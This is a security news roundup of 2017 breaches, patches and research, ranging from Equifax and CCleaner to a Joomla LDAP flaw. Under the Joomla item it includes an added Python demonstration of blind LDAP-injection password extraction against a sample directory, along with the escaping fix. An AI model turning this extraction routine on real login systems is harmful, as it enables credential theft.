Security: Deloitte, Ransomware, Equifax, Denmark, and macOS 0-Day

Filed under
Security
  • Deloitte hack exposes secret emails and plans from firm's blue-chip clients

    Hackers [sic] are said to have accessed confidential emails and plans of Deloitte's blue-chip clients, along with usernames, passwords, IP addresses, architectural diagrams for businesses and health information.

  • Deloitte hit by cyber-attack revealing clients’ secret emails

    Deloitte, which is registered in London and has its global headquarters in New York, was the victim of a cybersecurity attack that went unnoticed for months.

  • A quarter of local UK councils have fallen victim to ransomware

    115 councils (27 per cent) said they had been victims of security ransoms, while 43 per cent said they hadn't.

  • Equifax CEO Richard Smith Retires as Breach Fallout Continues

    Equifax's massive data breach has claimed another victim - Richard Smith, the company's CEO and Chairman of the Board. Equifax announced that Smith is retiring from his role at the company, effective Sept. 26.

    "The cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right," Smith stated. "At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward."

    Equifax announced on Sept. 7 that it was the victim of a data breach that exposed personally identifiable information on 143 million Americans. The company initially reported that it first became aware of the breach on July 29, though subsequent reports have alleged that the company was breached as early as March.

  • Denmark continues its work on cyber security plan

    Denmark’s Ministry of Finance is to finalise Denmark’s national strategy for cyber and information security. The ministry recently took over coordination of the plans, which previously were being prepared by the Ministry of Defence. The strategy is to be presented early next year, reports Denmark’s Agency for Digitisation (Digitaliseringsstyrelsen - DIGST).

  • Password-theft 0-day imperils users of High Sierra and earlier macOS versions

    There's a vulnerability in High Sierra and earlier versions of macOS that allows rogue applications to steal plaintext passwords stored in the Mac keychain, a security researcher said Monday. That's the same day the widely anticipated update was released.

    The Mac keychain is a digital vault of sorts that stores passwords and cryptographic keys. Apple engineers have designed it so that installed applications can't access its contents without the user entering a master password. A weakness in the keychain, however, allows rogue apps to steal every plaintext password it stores with no password required. Patrick Wardle, a former National Security Agency hacker who now works for security firm Synack, posted a video demonstration here.

Security: Updates, CCleaner, and Capsule8

Filed under
Security
  • Security updates for Monday
  • CCleaner malware may be from Chinese group: Avast

    Security company Avast says it has found similarities between the code injected into CCleaner and the APT17/Aurora malware created by a Chinese advanced persistent threat group in 2014/2015.

  • Capsule8 Raises New Funds to Help Improve Container Security

    Container security startup Capsule8 is moving forward with beta customer deployments and a Series A round of funding, to help achieve its vision of providing a secure, production-grade approach to container security.

    The Series A round of funding was announced on Sept. 19, with the company raising $6 million, led by Bessemer and ClearSky, bringing total funding to date up to $8.5 million. Capsule8 first emerged from stealth in February 2017, though its core technology product still remains in private beta as the company fine-tunes the platform for production workload requirements.

Security: Adobe and Apple Fail/Fare Badly

Filed under
Security
  • In spectacular fail, Adobe security team posts private PGP key on blog

    Having some transparency about security problems with software is great, but Adobe's Product Security Incident Response Team (PSIRT) took that transparency a little too far today when a member of the team posted the PGP keys for PSIRT's e-mail account—both the public and the private keys. The keys have since been taken down, and a new public key has been posted in its stead.

  • Hackers Using iCloud's Find My iPhone Feature to Remotely Lock Macs and Demand Ransom Payments

    Over the last day or two, several Mac users appear to have been locked out of their machines after hackers signed into their iCloud accounts and initiated a remote lock using Find My iPhone. 

    With access to an iCloud user's username and password, Find My iPhone on iCloud.com can be used to "lock" a Mac with a passcode even with two-factor authentication turned on, and that's what's going on here.

Security: DHS on Potential Voting Machines Cracking, Joomla Patches Critical Flaw

Filed under
Security
  • DHS tells 21 states they were Russia hacking targets before 2016 election
  • WikiLeaks, Russian edition: how it’s being viewed

    Russia has been investing heavily in a vision of cyberdemocracy that will link the public directly with government officials to increase official responsiveness. But it is also enforcing some of the toughest cybersecurity laws to empower law enforcement access to communications and ban technologies that could be used to evade surveillance. Could WikiLeaks put a check on Russia’s cyber regime? This week, the online activist group released the first of a promised series of document dumps on the nature and workings of Russia’s surveillance state. So far, the data has offered no bombshells. “It’s mostly technical stuff. It doesn’t contain any state contracts, or even a single mention of the FSB [security service], but there is some data here that’s worth publishing,” says Andrei Soldatov, coauthor of “The Red Web,” a history of the Soviet and Russian internet. But, he adds, “Anything that gets people talking about Russia's capabilities and actions in this area should be seen as a positive development.”

  • Joomla patches eight-year-old critical CMS bug

    Joomla has patched a critical bug which could be used to steal account information and fully compromise website domains.

    This week, the content management system (CMS) provider issued a security advisory detailing the flaw, which is found in the LDAP authentication plugin.

    Lightweight Directory Access Protocol (LDAP) is used by Joomla to access directories over TCP/IP. The plugin is integrated with the CMS.

    Joomla considers the bug a "medium" severity issue, but according to researchers from RIPS Technologies, the problem is closer to a critical status.

  • Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection

    With over 84 million downloads, Joomla! is one of the most popular content management systems in the World Wide Web. It powers about 3.3% of all websites’ content and articles. Our code analysis solution RIPS detected a previously unknown LDAP injection vulnerability in the login controller. This one vulnerability could allow remote attackers to leak the super user password with blind injection techniques and to fully take over any Joomla! <= 3.7.5 installation within seconds that uses LDAP for authentication. Joomla! has fixed the vulnerability in the latest version 3.8.
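
    The two Joomla! items above describe an LDAP injection in a login controller and a blind, character-by-character leak of the super user password. As an added illustration (not the Joomla! code and not the RIPS proof of concept, neither of which the page reproduces), the Python below sketches the general mechanism: an unescaped username is spliced into an LDAP search filter, a wildcard assertion injected into that filter turns "the login search found an entry" into a one-bit oracle, and RFC 4515 escaping of the value closes the hole. The in-memory directory, the filter shape, the attribute names and the oracle are all constructed for the example; against a real directory the targeted attribute must also permit substring matching, and the oracle is whatever observable difference the application leaks (an error message, a timing gap, a redirect).

```python
import re
import string

# Constructed sample directory standing in for the LDAP server (not real data).
DIRECTORY = [
    {"uid": "admin", "userPassword": "S3cr3t!", "objectClass": "person"},
    {"uid": "alice", "userPassword": "hunter2", "objectClass": "person"},
]
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def escape_filter_value(value: str) -> str:
    """Escape a value for use inside an LDAP search filter (RFC 4515)."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def build_filter_unsafe(username: str) -> str:
    # Hypothetical vulnerable login filter: the username is spliced in verbatim.
    return "(&(uid=%s)(objectClass=person))" % username


def build_filter_safe(username: str) -> str:
    # Hardened form: every filter metacharacter in the input is escaped first.
    return "(&(uid=%s)(objectClass=person))" % escape_filter_value(username)


def _unescape(value: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def parse_filter(s: str, i: int = 0):
    """Minimal parser for &, |, ! and attr=value (with * wildcards)."""
    if s[i] != "(":
        raise ValueError("filter must start with '('")
    i += 1
    if s[i] in "&|":
        op, i, children = s[i], i + 1, []
        while s[i] == "(":
            child, i = parse_filter(s, i)
            children.append(child)
        return (op, children), i + 1          # skip the closing ')'
    if s[i] == "!":
        child, i = parse_filter(s, i + 1)
        return ("!", child), i + 1
    eq = s.index("=", i)
    close = s.index(")", eq)                  # an escaped ')' is '\29', so this is safe
    return ("=", s[i:eq], s[eq + 1:close]), close + 1


def evaluate(node, entry) -> bool:
    kind = node[0]
    if kind == "&":
        return all(evaluate(c, entry) for c in node[1])
    if kind == "|":
        return any(evaluate(c, entry) for c in node[1])
    if kind == "!":
        return not evaluate(node[1], entry)
    _, attr, value = node
    if attr not in entry:
        return False
    # A literal '*' splits the assertion into pieces; an escaped '\2a' stays literal.
    pattern = ".*".join(re.escape(_unescape(p)) for p in value.split("*"))
    return re.fullmatch(pattern, entry[attr]) is not None


def search_returns_entry(filter_str: str) -> bool:
    """The blind oracle: does the login search find any entry at all?"""
    node, _ = parse_filter(filter_str)
    return any(evaluate(node, e) for e in DIRECTORY)


def extract_attribute_blind(uid: str, attr: str, alphabet: str = ALPHABET, max_len: int = 64):
    """Recover `attr` of the entry `uid` one character at a time with wildcard probes."""
    known = ""
    for _ in range(max_len):
        exact = build_filter_unsafe("%s)(%s=%s" % (uid, attr, escape_filter_value(known)))
        if known and search_returns_entry(exact):
            return known                      # whole value recovered
        for ch in alphabet:
            probe = build_filter_unsafe(
                "%s)(%s=%s*" % (uid, attr, escape_filter_value(known + ch)))
            if search_returns_entry(probe):
                known += ch
                break
        else:
            return None                       # no character extends the prefix
    return known


if __name__ == "__main__":
    print(build_filter_unsafe("admin)(userPassword=S*"))   # injected clause survives
    print(build_filter_safe("admin)(userPassword=S*"))     # metacharacters neutralised
    print(extract_attribute_blind("admin", "userPassword"))
```

    Each probe costs one login request, so the attack runs in a number of requests linear in the password length times the alphabet size; that is the "seconds" in the RIPS headline. Escaping is the fix, not blocklisting individual characters: the parser above shows why, since a single unescaped `)` is enough to close the intended assertion and open an attacker-controlled one.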

Security: FOSS Updates, SEC, CCleaner

Filed under
Security
  • Security updates for Friday
  • SEC Chairman reveals financial reporting system was hacked
  • CCleaner malware outbreak is much worse than it first appeared
  • CCleaner Hack May Have Been A State-Sponsored Attack On 18 Major Tech Companies

    At the beginning of this week, reports emerged that Avast, owner of the popular CCleaner software, had been hacked. Initial investigations by security researchers at Cisco Talos discovered that the intruder not only compromised Avast's servers, but managed to embed both a backdoor and "a multi-stage malware payload" that rode on top of the installation of CCleaner. That infected software -- traditionally designed to help scrub PCs of cookies and other tracking software and malware -- was subsequently distributed by Avast to 700,000 customers (initially, that number was thought to be 2.27 million).

    And while that's all notably terrible, it appears initial reports dramatically under-stated both the scope and the damage done by the hack. Initially, news reports and statements by Avast insisted that the hackers weren't able to "do any harm" because the second, multi-stage malware payload was never effectively delivered. But subsequent reports by both Avast and Cisco Talos researchers indicate this payload was effectively delivered -- with the express goal of gaining access to the servers and networks of at least 18 technology giants, including Intel, Google, Microsoft, Akamai, Samsung, Sony, VMware, HTC, Linksys, D-Link and Cisco itself.

IoT botnet Linux.ProxyM turns its grubby claws to spam rather than DDoS

Filed under
Security

An IoT botnet is making a nuisance of itself online after becoming a conduit for spam distribution.

Linux.ProxyM has the capability to engage in email spam campaigns with marked difference to other IoT botnets, such as Mirai, that infamously offered a potent platform for running distributed-denial-of-service attacks (DDoSing). Other IoT botnets have been used as proxies to offer online anonymity.

Security: Antipatterns in IoT Security, Signing Programs for Linux, and Guide to Two-Factor Authentication

Filed under
Security
  • Antipatterns in IoT security

    Security for Internet of Things (IoT) devices is something of a hot topic over the last year or more. Marti Bolivar presented an overview of some of the antipatterns that are leading to the lack of security for these devices at a session at the 2017 Open Source Summit North America in Los Angeles. He also had some specific recommendations for IoT developers on how to think about these problems and where to turn for help in making security a part of the normal development process.

    A big portion of the talk was about antipatterns that he has seen—and even fallen prey to—in security engineering, he said. It was intended to help engineers develop more secure products on a schedule. It was not meant to be a detailed look at security technologies like cryptography, nor even a guide to what technical solutions to use. Instead, it targeted how to think about security with regard to developing IoT products.

  • Signing programs for Linux

    At his 2017 Open Source Summit North America talk, Matthew Garrett looked at the state of cryptographic signing and verification of programs for Linux. Allowing policies that would restrict Linux from executing programs that are not signed would provide a measure of security for those systems, but there is work to be done to get there. Garrett started by talking about "binaries", but programs come in other forms (e.g. scripts) so any solution must look beyond simply binary executables.

    There are a few different reasons to sign programs. The first is to provide an indication of the provenance of a program; whoever controls the key actually did sign it at some point. So if something is signed by a Debian or Red Hat key, it is strong evidence that it came from those organizations (assuming the keys have been securely handled). A signed program might be given different privileges based on the trust you place in a particular organization, as well.

  • A Guide to Common Types of Two-Factor Authentication on the Web

    Two-factor authentication (or 2FA) is one of the biggest-bang-for-your-buck ways to improve the security of your online accounts. Luckily, it's becoming much more common across the web. With often just a few clicks in a given account's settings, 2FA adds an extra layer of security to your online accounts on top of your password.

    In addition to requesting something you know to log in (in this case, your password), an account protected with 2FA will also request information from something you have (usually your phone or a special USB security key). Once you put in your password, you'll grab a code from a text or app on your phone or plug in your security key before you are allowed to log in. Some platforms call 2FA different things—Multi-Factor Authentication (MFA), Two Step Verification (2SV), or Login Approvals—but no matter the name, the idea is the same: Even if someone gets your password, they won't be able to access your accounts unless they also have your phone or security key.

    There are four main types of 2FA in common use by consumer websites, and it's useful to know the differences. Some sites offer only one option; other sites offer a few different options. We recommend checking twofactorauth.org to find out which sites support 2FA and how, and turning on 2FA for as many of your online accounts as possible. For more visual learners, this infographic from Access Now offers additional information.

    Finally, the extra layer of protection from 2FA doesn't mean you should use a weak password. Always make unique, strong passwords for each of your accounts, and then put 2FA on top of those for even better log-in security.

Security: SEC Breach, DNSSEC, FinFisher, CCleaner and CIA

Filed under
Security

Security: Apple's Betrayal, Intel ME Back Doors Backfire, and Optionsbleed

Filed under
Security
  • iOS 11 Muddies WiFi and Bluetooth Controls

    Turning WiFi and Bluetooth off is often viewed as a good security practice. Apple did not rationalize these changes in behavior.

  • How To Hack A Turned-Off Computer, Or Running Unsigned Code In Intel Management Engine

    Intel Management Engine is a proprietary technology that consists of a microcontroller integrated into the Platform Controller Hub (PCH) microchip with a set of built-in peripherals. The PCH carries almost all communication between the processor and external devices; therefore Intel ME has access to almost all data on the computer, and the ability to execute third-party code allows compromising the platform completely. Researchers have been long interested in such "God mode" capabilities, but recently we have seen a surge of interest in Intel ME. One of the reasons is the transition of this subsystem to a new hardware (x86) and software (modified MINIX as an operating system) architecture. The x86 platform allows researchers to bring to bear all the power of binary code analysis tools.

  • Optionsbleed: Don’t get your panties in a wad

    To be honest, this isn’t the first security concern you’ve run in to, and it isn’t the first security issue you’re vulnerable to, that will remain exploitable for quite some time, until after someone you rely on fixed the issue for you, meanwhile compromising your customers.

    [...]

    Is it a small part of the SSL public key? A small part of the web request response? A chunk of the path to the index.php? Or is it a chunk of the database password used? Nobody knows until you get enough data to analyse the results of all data. If you can’t appreciate the maths behind analysing multiple readings of 8 arbitrary bytes, choose another career. Not that I know what to do and how to do it, by the way.

Security: Patches, CCleaner, Equifax Story Changes, 'Trusted IoT Alliance', Kali Linux 2017.2 and NBN

Filed under
Security